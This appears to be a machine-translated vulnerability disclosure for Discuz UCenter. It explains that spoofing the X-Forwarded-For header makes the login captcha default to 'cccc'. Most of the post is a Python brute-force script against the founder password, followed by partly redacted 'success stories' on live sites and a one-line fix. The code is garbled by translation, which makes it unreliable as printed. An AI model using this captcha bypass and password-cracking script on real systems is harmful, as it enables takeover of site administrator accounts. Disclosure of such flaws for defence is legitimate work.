Discuz's UCenter founder password can be cracked (in some cases)
Without looking at the source code, you can directly test it in the black box. Non-verification code recognition.
So attach several success stories using code +.
Http: // 192.168.1.105/discuz/uc_server/admin. php
Contains a verification code
The Verification Code address is
Http: // localhost/discuz/uc_server/admin. php? M = seccode & seccodeauth = 250 dIGq % 2FYDhocuXf3IrsBkvB2k23JXlXAbuWr3X1liUcX94 & 7500
However
Tested and found
When you log on to uc_server, if the ip address appears for the first time, the default value of seccode is cccc.
The IP address is obtained through X-Forwarded-.
That is, after we modify the xff ip address, open the above verification code url again. The image value is cccc.
Therefore, you can write a program to crack the password by modifying the value of X-Forwarded-.
The program has been written as follows. (Code slag, sorry .) Take the Founder's password as an example. The Administrator's password should also work.
<Poc> # coding: utf-8import httplib, re, random, urllib, timefrom sys import argv # crack def getHtml (host, htmlhash, htmlpass, htmlseccode): ip = str (random. randint (1,100) + ". "+ str (random. randint (100,244) + ". "+ str (random. randint (100,244) + ". "+ str (random. randint (100,244) postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv: 33.0) gecko/20100101 Firefox/33.0 "," X-Forwarded-For ": ip, 'content-Typ E ': 'application/x-www-form-urlencoded', 'accept': 'text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 ', 'connection ': 'Keep-alive'} postContent = 'sid = & formhash = '+ htmlhash +' & seccodehidden = '+ htmlseccode +' & iframe = 0 & isfounder = 1 & password = '+ htmlpass + '& seccode = cccc & submit = % E7 % 99% BB + % E5 % BD % 95' resultHtml = httplib. HTTPConnection (host, 80, False) resultHtml. request ('post', '/uc_server/admin. php? M = user & a = login ', body = postContent, headers = postHead) page = resultHtml. getresponse () pageConect = page. read () return pageConect # Get formhash and seccodehiddendef gethashs (host): url = 'HTTP: // '+ host +'/uc_server/admin. php 'pagecontent = urllib. urlopen (url ). read () r1 = re. compile ('<input type = "hidden" name = "formhash" value = "(\ S +)"/>') htmlhash = r1.findall (pageContent) [0] r2 = re. compile ('<input type = "hidden" name = "seccodehidden" value = "(\ S +)"/>') htmlseccode = r2.findall (pageContent) [0] return htmlhash + ''+ htmlseccode # obtain the host dictionary interval through argv for blasting if (len (argv) = 1 ): print '----> python' + argv [0] + 'host address dictionary file interval 'print' ----> python' + argv [0] + '192.168.1.105 pass.txt 0.2' else: host = argv [1] passfile = argv [2] sleeptime = argv [3] print 'website host is '+ host # retrieve domain name and then add some passwords hostuser = host. split ('. ') hostuser = hostuser [len (hostuser)-2] hostpass = [hostuser + '000000', hostuser + '000000', hostuser + hostuser, hostuser + '.. ', hostuser + '. ', hostuser + 'admin888', hostuser + 'admin123', hostuser + 'admin ', hostuser + '000000'] print 'the password dictionary is' + passfileprint '. The interval is' + sleeptimeprint '---> 'X = gethashs (host ). split ('') f = open (passfile, 'R') htmlpass = f. read (). split ('\ r \ n') htmlpass = hostpass + htmlpassf. close () for I in range (len (htmlpass): time. sleep (float (sleeptime) print 'attempt password' + htmlpass [I] if (getHtml (host, x [0], htmlpass [I], x [1]) = ''): print '. The password is' + htmlpass [I] break </poc>
Python dz_blast.py 192.168.1.117 pass.txt 0
192.168.1.117 dz built in a new Virtual Machine
Attached success stories
Without such a dictionary at hand, I just added a few passwords to test, which are common weak passwords.
1.http://**.**.**/ admin123456_2.http://**.**.**/ admin_3.http://**.**.**/ 123456
Solution:
Enhanced verification